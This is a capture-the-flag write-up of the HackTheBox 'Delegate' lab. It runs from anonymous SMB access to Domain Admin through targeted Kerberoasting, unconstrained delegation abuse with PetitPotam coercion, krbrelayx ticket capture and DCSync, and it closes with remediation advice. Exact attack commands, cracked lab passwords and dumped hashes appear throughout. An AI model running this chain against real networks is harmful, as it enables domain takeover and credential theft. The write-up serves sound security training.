HackTheBoxActiveDirectoryWindowsVulnLabs

Delegate

A full AD compromise of the "Delegate" Box. Initial access via hardcoded SMB credentials leads to Domain Admin by chaining Targeted Kerberoasting, Unconstrained Delegation, and PetitPotam coercion.

1. Reconnaissance and Enumeration

The engagement began with a standard port scan using nmap against the target IP (10.129.234.69).

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.234.69 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-06 14:57 -0500
Nmap scan report for 10.129.234.69
Host is up (0.25s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-06 19:58:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2026-03-05T19:55:50
|_Not valid after:  2026-09-04T19:55:50
|_ssl-date: 2026-03-06T19:59:12+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   DNS_Tree_Name: delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-06T19:58:33+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-06T19:58:37
|_  start_date: N/A

The scan revealed a Windows Server 2022 machine acting as a Domain Controller for delegate.vl. Standard Active Directory ports were open, including DNS (53), Kerberos (88), LDAP (389, 636, 3268, 3269), SMB (445), and WinRM (5985). With SMB open, the next step was to check for null session or Guest access using NetExec (nxc).

SMB Share Enumeration: Logging in as the Guest user with a blank password successfully enumerated the standard NETLOGON and SYSVOL shares.

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.69 -u "Guest" -p "" --shares
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [+] delegate.vl\Guest: 
SMB         10.129.234.69   445    DC1              [*] Enumerated shares
SMB         10.129.234.69   445    DC1              Share           Permissions     Remark
SMB         10.129.234.69   445    DC1              -----           -----------     ------
SMB         10.129.234.69   445    DC1              ADMIN$                          Remote Admin
SMB         10.129.234.69   445    DC1              C$                              Default share
SMB         10.129.234.69   445    DC1              IPC$            READ            Remote IPC
SMB         10.129.234.69   445    DC1              NETLOGON        READ            Logon server share 
SMB         10.129.234.69   445    DC1              SYSVOL          READ            Logon server share

RID Brute Forcing: Using the Guest session, RID brute-forcing revealed several custom domain users, including A.Briggs, N.Thompson, and a custom group named delegation admins.

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.69 -u "Guest" -p "" --rid-brute
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [+] delegate.vl\Guest: 
SMB         10.129.234.69   445    DC1              498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              500: DELEGATE\Administrator (SidTypeUser)
SMB         10.129.234.69   445    DC1              501: DELEGATE\Guest (SidTypeUser)
SMB         10.129.234.69   445    DC1              502: DELEGATE\krbtgt (SidTypeUser)
SMB         10.129.234.69   445    DC1              512: DELEGATE\Domain Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              513: DELEGATE\Domain Users (SidTypeGroup)
SMB         10.129.234.69   445    DC1              514: DELEGATE\Domain Guests (SidTypeGroup)
SMB         10.129.234.69   445    DC1              515: DELEGATE\Domain Computers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              516: DELEGATE\Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              517: DELEGATE\Cert Publishers (SidTypeAlias)
SMB         10.129.234.69   445    DC1              518: DELEGATE\Schema Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              519: DELEGATE\Enterprise Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.234.69   445    DC1              521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              525: DELEGATE\Protected Users (SidTypeGroup)
SMB         10.129.234.69   445    DC1              526: DELEGATE\Key Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.234.69   445    DC1              571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.69   445    DC1              572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.69   445    DC1              1000: DELEGATE\DC1$ (SidTypeUser)
SMB         10.129.234.69   445    DC1              1101: DELEGATE\DnsAdmins (SidTypeAlias)
SMB         10.129.234.69   445    DC1              1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.234.69   445    DC1              1104: DELEGATE\A.Briggs (SidTypeUser)
SMB         10.129.234.69   445    DC1              1105: DELEGATE\b.Brown (SidTypeUser)
SMB         10.129.234.69   445    DC1              1106: DELEGATE\R.Cooper (SidTypeUser)
SMB         10.129.234.69   445    DC1              1107: DELEGATE\J.Roberts (SidTypeUser)
SMB         10.129.234.69   445    DC1              1108: DELEGATE\N.Thompson (SidTypeUser)
SMB         10.129.234.69   445    DC1              1121: DELEGATE\delegation admins (SidTypeGroup)

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ nxc smb 10.129.234.69 -u users.txt -p users.txt --no-brute
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [-] delegate.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\A.Briggs:A.Briggs STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\b.Brown:b.Brown STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\R.Cooper:R.Cooper STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\J.Roberts:J.Roberts STATUS_LOGON_FAILURE 
SMB         10.129.234.69   445    DC1              [-] delegate.vl\N.Thompson:N.Thompson STATUS_LOGON_FAILURE

2. Initial Access

Accessing the NETLOGON share anonymously via smbclient revealed a script named users.bat. Downloading and inspecting this batch file yielded hardcoded credentials for a domain user:

Username: [email protected]
Password: P4ssw0rd1#123

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ smbclient  //10.129.234.69/NETLOGON -U Guest%""         
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

				 4652287 blocks of size 4096. 1160854 blocks available
smb: \> get users.bat

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ cat users.bat                                
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

Further enumeration using these valid credentials confirmed that the ms-DS-MachineAccountQuota attribute was set to the default value of 10, meaning standard users could add up to 10 computer accounts to the domain.

ldapsearch -x -H ldap://10.129.234.69 \
-D "[email protected]" \
-w 'P4ssw0rd1#123' \
-b "DC=delegate,DC=vl"

ms-DS-MachineAccountQuota: 10

3. Lateral Movement: Targeted Kerberoasting

With a foothold as A.Briggs, the next phase involved enumerating Active Directory object permissions using bloodyAD.

The output revealed a critical misconfiguration: A.Briggs had WRITE (GenericWrite) privileges over the user object N.Thompson.

┌──(kali㉿kali)-[~]
└─$ bloodyAD -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --host 10.129.234.69 get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=delegate,DC=vl
permission: WRITE

distinguishedName: CN=A.Briggs,CN=Users,DC=delegate,DC=vl
permission: WRITE

distinguishedName: CN=N.Thompson,CN=Users,DC=delegate,DC=vl
permission: WRITE

distinguishedName: CN=hackbox,CN=Computers,DC=delegate,DC=vl
permission: WRITE

This permission allows an attacker to modify attributes on the target user. To exploit this, a Targeted Kerberoasting attack was executed:

Setting a Fake SPN: Because A.Briggs has write access, bloodyAD was used to register a dummy Service Principal Name (fake/service) on N.Thompson's account. This action transforms N.Thompson into a service account in the eyes of Active Directory.

┌──(kali㉿kali)-[~]
└─$ bloodyAD -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' \
--host 10.129.234.69 \
set object N.Thompson servicePrincipalName -v "fake/service"
[+] N.Thompson's servicePrincipalName has been updated

Requesting the Ticket: Impacket's GetUserSPNs.py was then used to request a Ticket Granting Service (TGS) ticket for this newly created SPN. The Domain Controller responded with the ticket, which is encrypted with N.Thompson's password hash.

┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs delegate.vl/A.Briggs:'P4ssw0rd1#123' \ 
-dc-ip 10.129.234.69 \
-request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name        MemberOf                                         PasswordLastSet             LastLogon                   Delegation 
--------------------  ----------  -----------------------------------------------  --------------------------  --------------------------  ----------
fake/service          N.Thompson  CN=delegation admins,CN=Users,DC=delegate,DC=vl  2023-09-09 11:17:16.247262  2023-09-16 03:18:20.238500             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$98d6b6556e4d60bd93f31f3f01b9f26e$7e5dae90043d7989d40989179494df4fd46d35909e5f3e7a720bc6d55072b6fceb4f2f739ce43cf9c2493023a674c18600e75892d029a884e93c4608163242e8c093294413575977aab2f3b5d381fd81c8b9bce33b266c66a1878af46e63650c07b537ad84e3858ddebf0626426a0b8ebc1a5d38a60108e3e7d416ec5a1b04a760bf722e6e7df46cfc6c9f51bc991f30bdda256746270660374ef7ee4b887e8d31b9467e55f42effd4a2899749b88e3af149935749fe6ff7f98918a46b1fea7a3af74d55f688d0d6c8ee53822f16223baefe425b4a2ec88a5aa0b0be33f88f850fd36b3344f1f77eebedc5649aaba56c36fe3bc555cc0bf39a75cbac29c10225fdfe310582c03a93a69edd55362edb06d516e240408ac8caef9b917500c19ced953f54df88b2a6871af41ace66a853c60cd677fee2be4a866150fe3148f3ef6b1196f96b29822b7a07307efa981266cc8285fc99a5f40db77a9ed672839ae82ef2fefc5c56dbb0fcdcf3aceb62f9187191959e912f9d7101b543a9e0a2404c42cd998099faa4e18c67f63d576ce5e7cda10d6fff44f3a4f0c8d240d2c3d17e0d19c5cb403451ee8d25ab098572a0b441a7abe2569861697daa765e2ebed4a845a09d79b9713956d98e63503e0e0ea11f991f262010550ce4a225a8376ea7b0cadfc62047a32e4762919f7a40a879a956cde7db0512b62578a8829c2296df1795f4beaeaa8203a11b69ef6df37997dfdeccd9d86219e6436bd873f57ab0f42fd4f34890285d4e7cc20437af482a96bc8fe9d32445ed42d820187b3c2e16eafa3bf1fcb03c72ec3f5dc243a133bac3a91dd0be245f7cdd5e561e2f45dd99d827484cbf791ea918c5b96f32bb3804bb11b559b963112f82debc86932e26dc555e125d330c4c937252839435176d1a35e68e78650457b3c63b35b71c36e25ced9836ed1f003b19b1f12a5c502177165aaffc80fe8bab8eaa08b31f3203af1de6b47f3b789744c4e04e038d816e115bd4c7f5aa0c017972b04c939fef29e76ad37f68601649d6b85aa973eeee27e8fee015bb6bdb14c80c81b66468399fec27cbe5038518862f290d63b63397a5fb361318e2f07df37628bae62c4be45ffcb0be078495a6b92198109dcdd9789fe0f634b5fe242d8d3ae97d322a2a431f10f7a300d4d8cb71035a2e02f37083710d4a55e5eb5a786830383fbee47fb02d919fce680f66d1eb63a8a31e410fd4bfde5403d245b6744f2c4df76cee549472836306cea013deaab530b5c18d5a67623437145dd20afe9d62d18cc8def6fdbb6324c43c28267a38330db1830da31a036562e83069cb2917b2b28838f9e46cd576602228d3d948b0c1c6c0df3a345fc428d056ddd5365e3852e2d8a012d75b080f81737169bb0e79b23b8c41cace0230c8a1824961fe58c65b6a84f56e29f6d77f60478f37b3a2c6e4

Offline Cracking: The TGS hash was saved and run through hashcat (mode 13100) using the rockyou.txt wordlist. The password was successfully cracked in under 10 seconds:

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$98d6b6556e4d60bd93f31f3f01b9f26e$7e5dae90043d7989d40989179494df4fd46d35909e5f3e7a720bc6d55072b6fceb4f2f739ce43cf9c2493023a674c18600e75892d029a884e93c4608163242e8c093294413575977aab2f3b5d381fd81c8b9bce33b266c66a1878af46e63650c07b537ad84e3858ddebf0626426a0b8ebc1a5d38a60108e3e7d416ec5a1b04a760bf722e6e7df46cfc6c9f51bc991f30bdda256746270660374ef7ee4b887e8d31b9467e55f42effd4a2899749b88e3af149935749fe6ff7f98918a46b1fea7a3af74d55f688d0d6c8ee53822f16223baefe425b4a2ec88a5aa0b0be33f88f850fd36b3344f1f77eebedc5649aaba56c36fe3bc555cc0bf39a75cbac29c10225fdfe310582c03a93a69edd55362edb06d516e240408ac8caef9b917500c19ced953f54df88b2a6871af41ace66a853c60cd677fee2be4a866150fe3148f3ef6b1196f96b29822b7a07307efa981266cc8285fc99a5f40db77a9ed672839ae82ef2fefc5c56dbb0fcdcf3aceb62f9187191959e912f9d7101b543a9e0a2404c42cd998099faa4e18c67f63d576ce5e7cda10d6fff44f3a4f0c8d240d2c3d17e0d19c5cb403451ee8d25ab098572a0b441a7abe2569861697daa765e2ebed4a845a09d79b9713956d98e63503e0e0ea11f991f262010550ce4a225a8376ea7b0cadfc62047a32e4762919f7a40a879a956cde7db0512b62578a8829c2296df1795f4beaeaa8203a11b69ef6df37997dfdeccd9d86219e6436bd873f57ab0f42fd4f34890285d4e7cc20437af482a96bc8fe9d32445ed42d820187b3c2e16eafa3bf1fcb03c72ec3f5dc243a133bac3a91dd0be245f7cdd5e561e2f45dd99d827484cbf791ea918c5b96f32bb3804bb11b559b963112f82debc86932e26dc555e125d330c4c937252839435176d1a35e68e78650457b3c63b35b71c36e25ced9836ed1f003b19b1f12a5c502177165aaffc80fe8bab8eaa08b31f3203af1de6b47f3b789744c4e04e038d816e115bd4c7f5aa0c017972b04c939fef29e76ad37f68601649d6b85aa973eeee27e8fee015bb6bdb14c80c81b66468399fec27cbe5038518862f290d63b63397a5fb361318e2f07df37628bae62c4be45ffcb0be078495a6b92198109dcdd9789fe0f634b5fe242d8d3ae97d322a2a431f10f7a300d4d8cb71035a2e02f37083710d4a55e5eb5a786830383fbee47fb02d919fce680f66d1eb63a8a31e410fd4bfde5403d245b6744f2c4df76cee549472836306cea013deaab530b5c18d5a67623437145dd20afe9d62d18cc8def6fdbb6324c43c28267a38330db1830da31a036562e83069cb2917b2b28838f9e46cd576602228d3d948b0c1c6c0df3a345fc428d056ddd5365e3852e2d8a012d75b080f81737169bb0e79b23b8c41cace0230c8a1824961fe58c65b6a84f56e29f6d77f60478f37b3a2c6e4:KALEB_2341
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...a2c6e4
Time.Started.....: Fri Mar  6 15:41:14 2026, (6 secs)
Time.Estimated...: Fri Mar  6 15:41:20 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  1784.7 kH/s (1.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11005952/14344385 (76.73%)
Rejected.........: 0/11005952 (0.00%)
Restore.Point....: 11001856/14344385 (76.70%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: KANGOL1 -> K000001206
Hardware.Mon.#01.: Util: 76%

Started: Fri Mar  6 15:41:13 2026
Stopped: Fri Mar  6 15:41:21 2026

N.Thompson's Password: KALEB_2341 Using these new credentials, WinRM access was achieved via evil-winrm, and the user.txt flag was captured.

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ nxc winrm 10.129.234.69 -u N.Thompson -p KALEB_2341               
WINRM       10.129.234.69   5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) 
WINRM       10.129.234.69   5985   DC1              [+] delegate.vl\N.Thompson:KALEB_2341 (Pwn3d!)

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ evil-winrm -i 10.129.234.69 -u N.Thompson -p 'KALEB_2341'

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> type ../Desktop/user.txt
b798xxxxxxxxxxxxxxxxxxxxxx01c6

4. Privilege Escalation: Unconstrained Delegation and Coercion

Logging in as N.Thompson provided a deeper level of access. Because N.Thompson belongs to the delegation admins group, they possess elevated privileges regarding delegation settings.

The path to Domain Admin involved abusing Unconstrained Delegation combined with NTLM coercion.

Step 4a: Infrastructure Setup

Creating a Machine Account: Impacket's addcomputer.py was used to create a new computer account named delegator$ with a known password.

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py \
delegate.vl/N.Thompson:'KALEB_2341' \
-dc-ip 10.129.234.69 \
-computer-name 'delegator$' \
-computer-pass 'Password123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account delegator$ with password Password123!.

Enabling Unconstrained Delegation: bloodyAD was used to modify the userAccountControl property of delegator$, adding the TRUSTED_FOR_DELEGATION flag.

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ bloodyAD -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host '10.129.234.69' add uac 'delegator$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to delegator$'s userAccountControl

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ python3 -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "Password123!".encode("utf-16le")).digest()).decode())'
2b576acbe6bcfda7294d6bd18041b8fe

DNS and SPN Configuration: To ensure the upcoming relay attack routed correctly, dnstool.py added an A record pointing delegator.delegate.vl to the attacker's IP address. addspn.py then registered a CIFS SPN to the delegator$ account.

python3 krbrelayx/dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r delegator.delegate.vl -a add -t A -d 10.10.16.5 10.129.234.69

python3 krbrelayx/addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -t delegator$ -s cifs/delegator.delegate.vl -a -dc-ip 10.129.234.69 dc1.delegate.vl

Step 4b: Coercion and TGT Capture

With the trap set, krbrelayx.py was started on the attacker machine, listening for incoming connections and configured to extract Kerberos tickets.

python3 krbrelayx/krbrelayx.py -hashes :2b576acbe6bcfda7294d6bd18041b8fe

Next, PetitPotam was used to coerce the Domain Controller (DC1) into authenticating against the attacker-controlled machine (delegator.delegate.vl).

┌──(kali㉿kali)-[~/Documents/delegate/PetitPotam]
└─$ python3 PetitPotam.py -target-ip 10.129.234.69 -u 'delegator$' -p 'Password123!' delegator dc1.delegate.vl

Trying pipe lsarpc
[-] Connecting to ncacn_np:dc1.delegate.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

When DC1 reached out to the attacker machine, it saw the TRUSTED_FOR_DELEGATION flag.
Because of Unconstrained Delegation, DC1 sent its own Ticket Granting Ticket (TGT) along with the authentication request, allowing the service to impersonate the DC.
krbrelayx successfully captured the TGT for [email protected] and saved it to a .ccache file.

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ python3 ./krbrelayx/krbrelayx.py -hashes :2b576acbe6bcfda7294d6bd18041b8fe 
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.69
[*] Got ticket for [email protected] [[email protected]]
[*] Saving ticket in [email protected][email protected]
[*] SMBD: Received connection from 10.129.234.69
[*] Got ticket for [email protected] [[email protected]]
[*] Saving ticket in [email protected][email protected]

Step 4c: DCSync and Domain Admin

The captured TGT effectively granted the attacker the identity of the Domain Controller itself.

The KRB5CCNAME environment variable was exported to use the captured TGT.
Impacket's secretsdump.py was executed to perform a DCSync attack. Because the DC has replication rights, it dumped the NTDS.DIT secrets, yielding the NTLM hash for the Administrator account

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ export KRB5CCNAME=DC1\[email protected][email protected] 
┌──(kali㉿kali)-[~/Documents/delegate]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
-k -just-dc-user Administrator dc1.delegate.vl
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198cexxxxxxxxxxxee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...

Finally, a Pass-The-Hash attack via evil-winrm provided an interactive shell as the Administrator, allowing for the retrieval of the root.txt flag.

┌──(kali㉿kali)-[~/Documents/delegate]
└─$ evil-winrm -i 10.129.234.69 -u Administrator -H c32198ceab4cc695e65045562aa3ee93

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b0cdeb8c88add39a947d37ff4b91b3b3

5. Executive Summary

During the engagement against the delegate.vl environment, multiple critical Active Directory misconfigurations were identified and chained together to achieve complete domain compromise. The attack path transitioned from unauthenticated enumeration to Domain Admin by exploiting a combination of poor credential management, overly permissive Access Control Lists (ACLs), and dangerous delegation settings.

Attack Path Overview:

Anonymous Access: Guest access to SMB shares revealed a batch script containing hardcoded domain credentials.
Insecure ACLs: The compromised user possessed GenericWrite privileges over another user account, allowing the attacker to register a Service Principal Name (SPN) and perform a Targeted Kerberoasting attack to capture their password.
Privilege Escalation: The second compromised user had the ability to configure Active Directory delegation. By creating a new machine account, configuring it for Unconstrained Delegation, and forcing the Domain Controller to authenticate to it (via PetitPotam), the attacker captured the Domain Controller's TGT, ultimately dumping the NTDS.dit database and retrieving the Domain Administrator hash.

6. Remediations & Mitigations

To secure the delegate.vl domain against the attack vectors demonstrated in this write-up, the following remediation steps should be implemented:

A. Secure SMB and Credential Management

Disable Guest/Anonymous Access: Ensure that anonymous and Guest access to SMB shares (like NETLOGON and SYSVOL) is strictly disabled to prevent unauthenticated enumeration.
Remove Hardcoded Credentials: Never store passwords in cleartext within logon scripts, batch files, or documentation. Utilize secure password managers or localized LAPS (Local Administrator Password Solution) for credential management.

B. Restrict Machine Account Creation

Modify ms-DS-MachineAccountQuota: By default, Active Directory allows any authenticated user to add up to 10 computer accounts to the domain. This attribute should be changed from 10 to 0 to prevent attackers from creating arbitrary machine accounts for use in delegation and relay attacks.

C. Audit Active Directory ACLs (Targeted Kerberoasting)

Enforce Least Privilege: Review Active Directory object permissions, specifically looking for users or groups with unnecessary GenericAll, GenericWrite, or WriteProperty permissions over other users. A.Briggs should not have had the ability to modify N.Thompson's attributes.
Strong Passwords: Ensure that any account requiring an SPN (Service Accounts) utilizes a complex, randomly generated password of at least 25-30 characters to make Kerberoasting offline cracking mathematically infeasible.

D. Mitigate Unconstrained Delegation & Coercion

Disable Unconstrained Delegation: Unconstrained delegation is a legacy feature that is inherently unsafe because it caches the TGT of any user who authenticates to the service. Transition all services using Unconstrained Delegation to Constrained Delegation or Resource-Based Constrained Delegation (RBCD).
Protect Sensitive Accounts: Add highly privileged users (like Domain Admins) to the Protected Users security group, and check the "Account is sensitive and cannot be delegated" box on their AD account objects. This prevents their credentials from being delegated even if they authenticate to a compromised server.
Patch RPC Coercion Vulnerabilities: Apply the latest Microsoft security patches to mitigate MS-EFSRPC (PetitPotam) coercion attacks. Additionally, consider disabling the EFS service on Domain Controllers if it is not actively required.
Enforce SMB Signing: Require SMB signing across the domain to prevent NTLM relay attacks from being used to compromise other endpoints.

PreviousSweep NextBruno

Last updated 10 days ago

hashtag1. Reconnaissance and Enumeration

hashtag2. Initial Access

hashtag3. Lateral Movement: Targeted Kerberoasting

hashtag4. Privilege Escalation: Unconstrained Delegation and Coercion

hashtagStep 4a: Infrastructure Setup

hashtagStep 4b: Coercion and TGT Capture

hashtagStep 4c: DCSync and Domain Admin

hashtag5. Executive Summary

hashtag6. Remediations & Mitigations

hashtagA. Secure SMB and Credential Management

hashtagB. Restrict Machine Account Creation

hashtagC. Audit Active Directory ACLs (Targeted Kerberoasting)

hashtagD. Mitigate Unconstrained Delegation & Coercion